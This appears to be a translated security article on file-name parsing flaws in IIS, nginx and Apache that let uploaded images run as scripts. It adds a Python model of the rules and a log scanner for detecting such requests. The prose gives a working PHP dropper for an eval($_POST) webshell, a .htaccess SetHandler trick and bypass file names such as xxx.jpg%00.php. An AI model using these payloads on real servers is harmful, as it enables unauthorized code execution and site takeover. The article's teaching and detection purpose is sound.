Original address: http://drops.wooyun.org/papers/539
1. IIS 5.x/6.0 parsing vulnerability
IIS 6.0 can be exploited in two ways:
1. Directory parsing
/xx.asp/xx.jpg
2. File parsing
wooyun.asp;.jpg
In the first case, a directory whose name ends in .asp or .asa is created under the web root; any file inside that directory, whatever its extension, is parsed and executed by IIS as ASP.
For example, create a directory wooyun.asp; then
/wooyun.asp/1.jpg
is executed as an ASP file. If the attacker can control the upload directory path, a shell is obtained regardless of whether the uploaded image is renamed.
In the second case, IIS 6.0 stops parsing the file name at the semicolon, so
wooyun.asp;.jpg
is treated by the server as wooyun.asp.
Besides .asp, IIS 6.0 executes these three extensions by default:
/wooyun.asa
/wooyun.cer
/wooyun.cdx
IIS 6.0 parsing vulnerability exploit cases on WooYun
http://www.wooyun.org/searchbug.php?q=IIS6.0
2. IIS 7.0/IIS 7.5/ Nginx <8.03 Malformed Parsing Vulnerability
The Nginx parsing vulnerability was discovered by the Chinese security team 80sec...
With the default FastCGI setup (PHP's cgi.fix_pathinfo=1), the attacker uploads a file named wooyun.jpg whose content is
<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>
and then requests wooyun.jpg/.php; PHP executes the image as a script and a one-line webshell shell.php is written into that directory.
Cases of this bug:
WooYun: SQL injection vulnerability + nginx parsing vulnerability in a substation of UF software
WooYun: Kingsoft.com X-level domain nginx parsing vulnerability + path disclosure
3. Nginx <8.03 Null Byte Code Execution Vulnerability
Affected versions: 0.5.*, 0.6.*, 0.7 <= 0.7.65, 0.8 <= 0.8.37
Embed PHP code in an image, then request it as
xxx.jpg%00.php
to execute the code.
Nginx null byte code execution vulnerability cases
http://www.wooyun.org/searchbug.php?q=%2500.php
4. Apache parsing vulnerability
Apache evaluates extensions from right to left; if an extension is not recognized, it moves on to the one to its left.
For example, in wooyun.php.owf.rar the suffixes ".owf" and ".rar" are not recognized by Apache, so Apache parses wooyun.php.owf.rar as PHP.
Knowing which suffixes the server treats as recognized is the key to exploiting this. When testing, try uploading names such as wooyun.php.rara.jpg.png... (chain every common suffix you know) to learn which suffixes count as recognized. Note that when PHP is mapped with AddType, a recognized image suffix at the far right (such as .png) sets the content type and the file is served as an image; only unrecognized suffixes to the right of .php are skipped.
Apache parsing vulnerability cases
http://www.wooyun.org/searchbug.php?q=apache%E8%A7%A3%E6%9E%90
5. Others
On Windows, file names ending in a space or a dot (xx.jpg[space], xx.jpg.) cannot exist; Windows silently strips trailing spaces and dots when the file is created. An attacker can intercept the upload request and append a space or a dot to a script file name to bypass an extension blacklist; if the upload succeeds, Windows removes the trailing character, the file is stored with its real extension, and a shell is obtained.
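The rules in sections 1 to 5 above are easiest to reason about as code. The following Python model is an added example, not code from the original article: each function takes a name as the server receives it and returns what the server actually executes. It uses the IIS 6 extension list from section 1, a hypothetical Apache AddType/AddHandler mapping constructed for this example, the PHP cgi.fix_pathinfo walk behind the nginx/IIS 7 case, and the NUL truncation behind the old nginx null-byte bug; all file names and paths in it are made up.

```python
"""Offline model of the file-name parsing rules described in the article.

Each function answers one question: given a name as the server receives it,
what does the server actually execute?  The extension tables are constructed
for this example (IIS 6 per section 1; the Apache mapping is a hypothetical
httpd.conf), not the servers' real configuration.
"""
from typing import Optional
from urllib.parse import unquote

# IIS 6 extensions the article names as executable.
IIS6_SCRIPT_EXTS = {"asp", "asa", "cer", "cdx"}

# Hypothetical Apache config: MIME types set by AddType, handlers by AddHandler.
APACHE_TYPES = {
    "php": "application/x-httpd-php",
    "jpg": "image/jpeg", "png": "image/png", "gif": "image/gif",
    "html": "text/html", "txt": "text/plain",
}
APACHE_HANDLERS = {"php": "application/x-httpd-php", "cgi": "cgi-script"}


def windows_normalize(name: str) -> str:
    """Windows strips trailing spaces and dots when creating a file, so
    'shell.php ' and 'shell.php.' both land on disk as 'shell.php'."""
    return name.rstrip(" .")


def iis6_script_type(url_path: str) -> Optional[str]:
    """Script type IIS 6 runs for a request path, or None for a static file.
    Directory rule: anything below a directory named *.asp/.asa/.cer/.cdx runs
    as that type.  Semicolon rule: the file name is cut at the first ';'."""
    segments = url_path.lstrip("/").split("/")
    for directory in segments[:-1]:
        ext = directory.rsplit(".", 1)[-1].lower() if "." in directory else ""
        if ext in IIS6_SCRIPT_EXTS:
            return ext
    filename = segments[-1].split(";", 1)[0]
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext if ext in IIS6_SCRIPT_EXTS else None


def apache_runs_php(filename: str, php_via_add_handler: bool = False) -> bool:
    """mod_mime looks at every extension; for each kind of metadata the
    right-most extension that sets it wins and unknown extensions are skipped.
    With AddType, a right-most '.jpg' overrides the PHP type ('x.php.jpg' is an
    image) but unknown suffixes do not ('x.php.owf.rar' is PHP).  With
    AddHandler, '.jpg' only changes the MIME type and the PHP handler survives."""
    exts = [e.lower() for e in filename.split(".")[1:]]
    table = APACHE_HANDLERS if php_via_add_handler else APACHE_TYPES
    for ext in reversed(exts):
        if ext in table:
            return table[ext] == "application/x-httpd-php"
    return False


def php_fix_pathinfo_target(script_filename: str, existing_files) -> Optional[str]:
    """With cgi.fix_pathinfo=1, php-cgi walks SCRIPT_FILENAME back one path
    component at a time until it hits an existing file and executes that one.
    So '/www/wooyun.jpg/.php' executes '/www/wooyun.jpg' (the nginx / IIS 7 case)."""
    path = script_filename
    while path and path != "/":
        if path in existing_files:
            return path
        path = path.rsplit("/", 1)[0]
    return None


def nginx_null_byte_target(url_path: str) -> Optional[str]:
    """In the affected nginx versions a %00 in the URI reaches the PHP backend;
    the regex location for '.php' still matches, but the C string used to open
    the file stops at the NUL, so 'xxx.jpg%00.php' is handed to PHP yet the
    file actually opened is 'xxx.jpg'."""
    decoded = unquote(url_path)
    if "\x00" not in decoded or not decoded.endswith(".php"):
        return None
    return decoded.split("\x00", 1)[0]


if __name__ == "__main__":
    print(iis6_script_type("/wooyun.asp/1.jpg"))            # asp
    print(iis6_script_type("/upload/wooyun.asp;.jpg"))      # asp
    print(apache_runs_php("wooyun.php.owf.rar"))            # True
    print(apache_runs_php("wooyun.php.jpg"))                # False
    print(php_fix_pathinfo_target("/www/wooyun.jpg/.php", {"/www/wooyun.jpg"}))
    print(nginx_null_byte_target("/img/xxx.jpg%00.php"))    # /img/xxx.jpg
    print(repr(windows_normalize("shell.php. ")))           # 'shell.php'
```

The point of keeping both Apache tables is the caveat from section 4: whether a trailing recognized suffix such as .jpg neutralises the .php depends on whether PHP was wired in with AddType (type metadata, overridden by .jpg) or AddHandler (handler metadata, untouched by .jpg), so the same upload name can be safe on one host and a shell on another.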
If Apache honours .htaccess files (AllowOverride) and a .htaccess can be uploaded, try writing the following into it:
<FilesMatch "wooyun.jpg"> SetHandler application/x-httpd-php </FilesMatch>
Then upload the webshell as wooyun.jpg, and wooyun.jpg will be parsed as a PHP file. The uploaded name must match the FilesMatch pattern: to use shell.jpg instead, write FilesMatch "shell.jpg".
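For the defensive side, the same five request shapes can be hunted in web server access logs. The scanner below is an added example, not part of the article: it runs over a handful of constructed log lines in Apache/nginx combined format and tags requests matching the IIS 6 directory and semicolon tricks, the .jpg/.php path-info case, the %00.php null byte, and Apache multiple extensions. The signature regexes and the sample lines are mine; a harmless double extension such as .php.bak will also trip the Apache rule, so treat hits as leads to confirm against the server's configuration rather than as proof.

```python
"""Tag requests in a combined-format access log that look like the parsing
tricks described above.  Log lines and signatures are constructed for this
example; they are not from any real incident."""
import re
from urllib.parse import unquote

# Constructed sample: Apache/nginx "combined" format, one request per line.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2013:10:01:02 +0800] "GET /upload/wooyun.asp;.jpg HTTP/1.1" 200 312 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2013:10:01:07 +0800] "GET /wooyun.asp/1.jpg HTTP/1.1" 200 312 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2013:10:02:15 +0800] "GET /images/wooyun.jpg/.php HTTP/1.1" 200 19 "-" "curl/7.29.0"
10.0.0.9 - - [12/Mar/2013:10:02:40 +0800] "GET /images/xxx.jpg%00.php HTTP/1.1" 200 19 "-" "curl/7.29.0"
10.0.0.9 - - [12/Mar/2013:10:03:01 +0800] "GET /files/wooyun.php.owf.rar HTTP/1.1" 200 19 "-" "curl/7.29.0"
10.0.0.22 - - [12/Mar/2013:10:04:00 +0800] "GET /images/logo.jpg HTTP/1.1" 200 4021 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Each signature is checked against the URL-decoded path (query string removed),
# so %00 becomes a real NUL byte before matching.
SIGNATURES = [
    ("iis6-script-dir",  re.compile(r"\.(asp|asa|cer|cdx)/", re.I)),   # /x.asp/1.jpg
    ("iis6-semicolon",   re.compile(r"\.(asp|asa|cer|cdx);", re.I)),   # x.asp;.jpg
    ("php-pathinfo",     re.compile(r"\.(jpe?g|png|gif|txt)/[^/]*\.php$", re.I)),  # x.jpg/.php
    ("nginx-nul-byte",   re.compile(r"\x00.*\.php$", re.I)),           # x.jpg%00.php
    ("apache-multi-ext", re.compile(r"\.php\.[a-z0-9.]+$", re.I)),     # x.php.owf.rar
]


def parse_line(line: str):
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def match_signatures(target: str):
    """Return the names of every signature the request target matches."""
    path = unquote(target.split("?", 1)[0])
    return [name for name, rx in SIGNATURES if rx.search(path)]


def scan_log(text: str):
    """Return one dict per suspicious request: client ip, raw target, status, tags."""
    hits = []
    for line in text.splitlines():
        fields = parse_line(line)
        if not fields:
            continue
        tags = match_signatures(fields["target"])
        if tags:
            hits.append({"ip": fields["ip"], "target": fields["target"],
                         "status": int(fields["status"]), "tags": tags})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'{hit["ip"]:<10} {hit["status"]} {",".join(hit["tags"]):<18} {hit["target"]}')
```

A tagged request that returned 200 is the one to chase first: for the path-info and null-byte shapes it means the backend actually ran the image, and the next step is to pull that file and look for a dropped shell.php beside it.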